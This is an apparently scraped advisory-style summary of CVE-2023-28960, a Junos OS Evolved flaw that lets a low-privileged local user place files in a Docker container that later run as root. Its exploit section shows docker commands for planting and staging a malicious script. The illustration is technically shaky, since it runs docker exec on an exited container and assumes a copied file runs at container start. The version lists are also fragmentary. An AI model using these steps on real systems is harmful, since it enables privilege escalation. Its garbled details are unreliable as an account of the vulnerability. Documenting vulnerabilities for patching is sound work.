A recently-discovered vulnerability in Juniper Networks Junos OS Evolved, designated as CVE-2023-28960, enables a local, authenticated low-privileged attacker to copy potentially malicious files into an existing Docker container on the local system. Once an administrator inadvertently starts the Docker container, the malicious files will be executed as root, compromising the system's security. Importantly, this vulnerability only impacts systems with Docker configured and enabled; by default, Docker is not enabled. Systems without Docker started are not susceptible to this issue.
21.4 versions prior to 21.4R2-EVO.
Please note that Juniper Networks Junos OS Evolved versions prior to 19.2R1-EVO are not affected by this vulnerability.
Exploit Details
Given that the vulnerability allows a local attacker to copy malicious files into a Docker container, an attacker could leverage this flaw to escalate their privileges by executing arbitrary code as root, potentially gaining full control over the system.
A low-privileged attacker finds an existing Docker container on the system
$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
17abcf3b3df8 vulnerable_image "/bin/bash" 5 hours ago Exited () 3 hours ago vulnerable_container
The attacker copies a malicious file into the container
$ docker cp /tmp/malicious_file.sh vulnerable_container:/root/malicious_file.sh
The attacker ensures that the malicious file is executable
$ docker exec vulnerable_container chmod +x /root/malicious_file.sh
When the administrator inadvertently starts the Docker container, the malicious file is executed
$ docker start vulnerable_container
21.4R2-EVO for 21.4 versions.
Administrators should update their Junos OS Evolved installations to the appropriate fixed releases. These updates are available from Juniper Networks' Support Website.
Original References
For more information on this vulnerability, refer to the Juniper Networks Security Advisory and the CVE-2023-28960 entry in the National Vulnerability Database.
Conclusion
CVE-2023-28960 is a significant vulnerability for systems with Docker configured and enabled in Juniper Networks Junos OS Evolved. Ensuring your installations are updated to the appropriate fixed releases is crucial to maintain secure operations. Stay apprised of updates and recommended practices by following Juniper Networks Security Advisories and the National Vulnerability Database.
Timeline
Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/18/2023 03:15:00 UTC